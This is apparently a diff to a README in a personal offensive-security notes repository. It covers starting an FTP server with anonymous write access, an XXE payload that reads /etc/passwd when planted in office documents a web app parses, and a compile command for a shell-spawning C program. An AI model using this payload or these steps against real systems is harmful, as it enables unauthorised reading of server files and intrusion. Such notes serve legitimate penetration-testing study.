ville87/offsec/Main/README.md

   Run (-w flag allows anonymous write access)
   `python -m pyftpdlib -p 21 -w`

+## XXE
+- Payload in office document
+  Locate data in the Excel / Word which is parsed by the web app (e.g. by opening the office document in VIM or 7zip) and insert xxe payload:
+  `<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>`
+  Wherever the value is added, replace the value with "&ent;"

 ## Compiling
 - Compiling a C program:
   `gcc -static -mpreferred-stack-boundary=2 -o Shell ShellSpawn.c`